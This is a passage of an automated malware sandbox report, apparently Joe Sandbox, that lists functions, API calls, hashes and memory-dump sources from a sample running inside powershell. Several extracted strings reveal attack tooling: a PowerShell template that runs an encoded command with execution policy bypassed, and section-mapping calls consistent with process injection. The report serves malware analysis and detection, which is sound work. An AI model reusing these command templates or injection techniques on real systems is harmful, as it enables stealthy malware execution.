Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

malloc.LIBCMT ref: 000001A6ED34F01D

Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F318
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F31D

malloc.LIBCMT ref: 000001A6ED34F03F
_snprintf.LIBCMT ref: 000001A6ED34F05A

Part of subcall function 000001A6ED34F63C: _errno.LIBCMT ref: 000001A6ED34F673
Part of subcall function 000001A6ED34F63C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F67E

malloc.LIBCMT ref: 000001A6ED34F075

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 000001A6ED34F044

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3518644649-2739389480
Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
Instruction ID: 7b18eadd757a682c9418717b6d9e0d1e0395228ff27811375ae0848f4e9277f9
Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
Instruction Fuzzy Hash: 5C01A13D702B9081EA44DB56B40479A6799E7AABE1F0D4219EEA9477C6CE3DC0468780

Function 000001A6ED2F25F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 000001A6ED2F262E
strchr.LIBCMT ref: 000001A6ED2F264C
malloc.LIBCMT ref: 000001A6ED2F2664
malloc.LIBCMT ref: 000001A6ED2F2671
rand.LIBCMT ref: 000001A6ED2F273D
free.LIBCMT ref: 000001A6ED2F285B
free.LIBCMT ref: 000001A6ED2F2863

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$rand
String ID:
API String ID: 1305919620-0
Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
Instruction ID: 8b2553344a161d3e03e5089553a4d6297c5a91504f89fb95048ae07593bc54b8
Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
Instruction Fuzzy Hash: D0715C75706BC4C9FAA6DB2D90103EE6390EF67B84F1C4910DB8927796DE3DC14A8701

Function 000001A6ED3431F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 000001A6ED34322E
strchr.LIBCMT ref: 000001A6ED34324C
malloc.LIBCMT ref: 000001A6ED343264
malloc.LIBCMT ref: 000001A6ED343271
rand.LIBCMT ref: 000001A6ED34333D
free.LIBCMT ref: 000001A6ED34345B
free.LIBCMT ref: 000001A6ED343463

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$rand
String ID:
API String ID: 1305919620-0
Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
Instruction ID: b6c34a314d4e5ae687b6b03afb14779867cf97947552048e22a21b26f5ea505d
Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
Instruction Fuzzy Hash: D671E979705EC4C1FA26DB2DA4113EAA390EFA7BD4F0C4125DB85177A6DE2EC14B8701

Function 000001A6ED2E3570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2E35BD

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

malloc.LIBCMT ref: 000001A6ED2E35C8

Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE718
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE71D

free.LIBCMT ref: 000001A6ED2E36AF
free.LIBCMT ref: 000001A6ED2E36B7
free.LIBCMT ref: 000001A6ED2E36BF
free.LIBCMT ref: 000001A6ED2E36CB
free.LIBCMT ref: 000001A6ED2E36D8

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 482d0fdc53c6e33f66ba6dffc81b941b5e36cde37b3349caf1d2ee2be4f6f9f6
Instruction ID: e97f98c2522ca171ca1488930f69e437e3f170aa6c209b03d12fac759129c140
Opcode Fuzzy Hash: 482d0fdc53c6e33f66ba6dffc81b941b5e36cde37b3349caf1d2ee2be4f6f9f6
Instruction Fuzzy Hash: 9C41FF3A302785DBEE96DB3A95502E92790BB2BB82F588420CF1647745EF34D46AC706

Function 000001A6ED334170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED3341BD

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

malloc.LIBCMT ref: 000001A6ED3341C8

Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F318
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F31D

free.LIBCMT ref: 000001A6ED3342AF
free.LIBCMT ref: 000001A6ED3342B7
free.LIBCMT ref: 000001A6ED3342BF
free.LIBCMT ref: 000001A6ED3342CB
free.LIBCMT ref: 000001A6ED3342D8

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
Instruction ID: 6c8017815ee8241c9cb913c08e7f176558ddf3d8fb5aeca4686d03f65dafb08e
Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
Instruction Fuzzy Hash: 0641E23E301B81CBEA55DBAA9A583DA2790B76BBC1F484120DE2697745DF38D42AC301

Function 000001A6ED33F274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 000001A6ED33F2ED
htonl.WS2_32 ref: 000001A6ED33F2F7
malloc.LIBCMT ref: 000001A6ED33F310
free.LIBCMT ref: 000001A6ED33F37D

Strings

zyxwvutsrqponmlk, xrefs: 000001A6ED33F34C

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: htonl$freemalloc
String ID: zyxwvutsrqponmlk
API String ID: 1249573706-3884694604
Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
Instruction ID: 8e720b555f92801d1f185432e6423b985cda95f5c3e742e637a3d6917173df1c
Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
Instruction Fuzzy Hash: 1C31473E302640C2EB44EA7EA5553E967C197ABBD4F4C4034AE5987797EE3DC40E8301

Function 000001A6ED343FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001A6ED343FE7
GetProcAddress.KERNEL32 ref: 000001A6ED343FF7

Part of subcall function 000001A6ED34C7E4: NtCreateSection.NTDLL ref: 000001A6ED34C88B

GetLastError.KERNEL32 ref: 000001A6ED3440BF

Part of subcall function 000001A6ED34CC00: GetCurrentProcess.KERNEL32 ref: 000001A6ED34CC8D
Part of subcall function 000001A6ED34CC00: NtMapViewOfSection.NTDLL ref: 000001A6ED34CCCC

Part of subcall function 000001A6ED34D134: GetCurrentProcess.KERNEL32 ref: 000001A6ED34D161
Part of subcall function 000001A6ED34D134: NtUnmapViewOfSection.NTDLL ref: 000001A6ED34D16D

Strings

ntdll.dll, xrefs: 000001A6ED343FD9
NtMapViewOfSection, xrefs: 000001A6ED343FED

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Section$CurrentProcessView$AddressCreateErrorHandleLastModuleProcUnmap
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 781901490-3170647572
Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
Instruction ID: c6f5260ba1d12be06aa3acda5af208ae3f7d818073f9a03eadb67ab2a4cb8621
Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
Instruction Fuzzy Hash: 9E31F43A312740C6EB10DB55E44979E6790F79ABA4F080325AE6907BD5DF7DC40A8701

Function 000001A6ED2FB630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 000001A6ED2FB654

Part of subcall function 000001A6ED2FF84C: _getptd.LIBCMT ref: 000001A6ED2FF854

malloc.LIBCMT ref: 000001A6ED2FB69C
strtok.LIBCMT ref: 000001A6ED2FB700
strtok.LIBCMT ref: 000001A6ED2FB711

Strings

eThreadpoolTimer, xrefs: 000001A6ED2FB6DA

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: strtok$_getptd_time64malloc
String ID: eThreadpoolTimer
API String ID: 1522986614-2707337283
Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
Instruction ID: 7c22a6096eee3687ac25aa00fec161f39c7199ff4ea91eefbbc8919bf99a5b1c
Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
Instruction Fuzzy Hash: 3721F6BA702794C5EB40DF1AE0886DD37A8F766BD4F2A4615EF1A43781DA30C0458780

Function 000001A6ED2F13B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2F13D2

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

_snprintf.LIBCMT ref: 000001A6ED2F13F1

Part of subcall function 000001A6ED2FEA3C: _errno.LIBCMT ref: 000001A6ED2FEA73
Part of subcall function 000001A6ED2FEA3C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FEA7E

remove.LIBCMT ref: 000001A6ED2F13FD
remove.LIBCMT ref: 000001A6ED2F1404

Strings

uld not open process: %d (%u), xrefs: 000001A6ED2F13D7

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: uld not open process: %d (%u)
API String ID: 2566950902-823969559
Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
Instruction ID: 9cdb8b2c6c4e8d98e7285474fee1b90deba0bf310ae1eadf348165d056c6b6e4
Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
Instruction Fuzzy Hash: C9F0903A306640CDE291DB16B8113DEA260E7A6FC0FAC4520AF8827B9ADE38C4058746

Function 000001A6ED341FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED341FD2

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

_snprintf.LIBCMT ref: 000001A6ED341FF1

Part of subcall function 000001A6ED34F63C: _errno.LIBCMT ref: 000001A6ED34F673
Part of subcall function 000001A6ED34F63C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED34F67E

remove.LIBCMT ref: 000001A6ED341FFD
remove.LIBCMT ref: 000001A6ED342004

Strings

%s\%s, xrefs: 000001A6ED341FD7

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: %s\%s
API String ID: 1896346573-4073750446
Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
Instruction ID: 79ccbc8aa192ec6f12e8206d5c48bd903cdbc77e541abd3d94443b7ff9fb6597
Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
Instruction Fuzzy Hash: 75F06D3D306B40C5E210DB15B9103DEA360A7A7BD0F5C4120AF8817B96CE7DC4168746

Function 000001A6ED33CA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED345FEC: malloc.LIBCMT ref: 000001A6ED346008

malloc.LIBCMT ref: 000001A6ED33CB3B

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

Part of subcall function 000001A6ED34C230: _time64.LIBCMT ref: 000001A6ED34C254
Part of subcall function 000001A6ED34C230: malloc.LIBCMT ref: 000001A6ED34C29C
Part of subcall function 000001A6ED34C230: strtok.LIBCMT ref: 000001A6ED34C300
Part of subcall function 000001A6ED34C230: strtok.LIBCMT ref: 000001A6ED34C311

Part of subcall function 000001A6ED3434A0: _time64.LIBCMT ref: 000001A6ED3434AE

Part of subcall function 000001A6ED34EAA8: malloc.LIBCMT ref: 000001A6ED34EAF8

Part of subcall function 000001A6ED34EAA8: realloc.LIBCMT ref: 000001A6ED34EB07

Part of subcall function 000001A6ED33F3C0: GetLocalTime.KERNEL32 ref: 000001A6ED33F3DF

malloc.LIBCMT ref: 000001A6ED33CC4A
_snprintf.LIBCMT ref: 000001A6ED33CCC1
_snprintf.LIBCMT ref: 000001A6ED33CCE7
free.LIBCMT ref: 000001A6ED33CEC6

Part of subcall function 000001A6ED34AD44: malloc.LIBCMT ref: 000001A6ED34AD78
Part of subcall function 000001A6ED34AD44: free.LIBCMT ref: 000001A6ED34AF2F

Part of subcall function 000001A6ED348E0C: htonl.WS2_32 ref: 000001A6ED348E3D
Part of subcall function 000001A6ED348E0C: htonl.WS2_32 ref: 000001A6ED348E4A

_snprintf.LIBCMT ref: 000001A6ED33CD0E

Part of subcall function 000001A6ED34DA74: Sleep.KERNEL32 ref: 000001A6ED34DABC
Part of subcall function 000001A6ED34DA74: ExitThread.KERNEL32 ref: 000001A6ED34DAC6

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
String ID:
API String ID: 548016584-0
Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
Instruction ID: d7b633631cf2eb5c66c04aba8959f66991daf2f3fe25f412757530f99b4edebb
Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
Instruction Fuzzy Hash: 4FC1AF3D303680C2FA54EB6EA5557EE6291ABA7780F8C5134AA25477D7DE3EC40EC702

Function 000001A6ED2EDA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001A6ED2EDB25

Part of subcall function 000001A6ED2FEA3C: _errno.LIBCMT ref: 000001A6ED2FEA73
Part of subcall function 000001A6ED2FEA3C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FEA7E

Part of subcall function 000001A6ED2F6F38: _snprintf.LIBCMT ref: 000001A6ED2F70A5

_snprintf.LIBCMT ref: 000001A6ED2EDBBD

Part of subcall function 000001A6ED2F2170: strchr.LIBCMT ref: 000001A6ED2F21D6
Part of subcall function 000001A6ED2F2170: _snprintf.LIBCMT ref: 000001A6ED2F220C

Part of subcall function 000001A6ED2F200C: strchr.LIBCMT ref: 000001A6ED2F2069
Part of subcall function 000001A6ED2F200C: _snprintf.LIBCMT ref: 000001A6ED2F20B3

_snprintf.LIBCMT ref: 000001A6ED2EDBD4

Strings

/'); %s, xrefs: 000001A6ED2EDB19, 000001A6ED2EDBB2
rshell -nop -exec bypass -EncodedCommand "%s", xrefs: 000001A6ED2EDACB

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
API String ID: 199363273-1250630670
Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
Instruction ID: 58ac02090bc863c427c30853611c5c9648959f4157d44c15331bf99041876f49
Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
Instruction Fuzzy Hash: F271E13A702681CAEB90DF69E4407EE63A1F7A6BD8F481411EE4917B95DF78C80DC741

Function 000001A6ED3400F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
Instruction ID: 2b9861c9e0f4d587ce8d6d85a699dccb87dd83427397cfdcece7fc1efee07ffb
Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
Instruction Fuzzy Hash: 4B51EF7AB06A40D6EB10EB69C4413ED2360F767BC8F489115EE092769ADF3EC94EC741

Function 000001A6ED2FFA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED2FFA64

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FFA6F
_flush.LIBCMT ref: 000001A6ED2FFB21
_fileno.LIBCMT ref: 000001A6ED2FFB42
_flsbuf.LIBCMT ref: 000001A6ED2FFB85

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: 57e757c3e9ef67bf585f6834bef5a2b93b5f2aba1b240188d6fdf149938e6fd1
Instruction ID: f6d22e2dd54e2c99c3a0c9d766660c98460cc3b0f2ef69c4d42d08f041983eb0
Opcode Fuzzy Hash: 57e757c3e9ef67bf585f6834bef5a2b93b5f2aba1b240188d6fdf149938e6fd1
Instruction Fuzzy Hash: 36412B3A302344CEFEA9DE2A95503DDA291B76AFD0F2C4A209F55577D1E678C44D820A

Function 000001A6ED35062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED350664

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED35066F
_flush.LIBCMT ref: 000001A6ED350721
_fileno.LIBCMT ref: 000001A6ED350742
_flsbuf.LIBCMT ref: 000001A6ED350785

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

